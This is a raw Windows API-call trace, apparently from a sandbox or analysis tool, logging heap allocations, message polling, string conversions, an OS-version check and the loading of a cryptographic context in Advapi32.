RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.344] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.344] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.344] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.344] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.345] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.345] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.345] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.345] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.346] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.346] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0267.346] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.346] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0267.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.347] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.347] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0267.347] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.348] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0267.348] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.348] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.348] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.348] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.348] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.348] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.349] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.350] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.350] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.350] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.351] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.351] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.354] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0267.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.357] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0267.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0267.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0267.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466df0 [0267.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.358] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0267.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0267.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0267.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.360] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 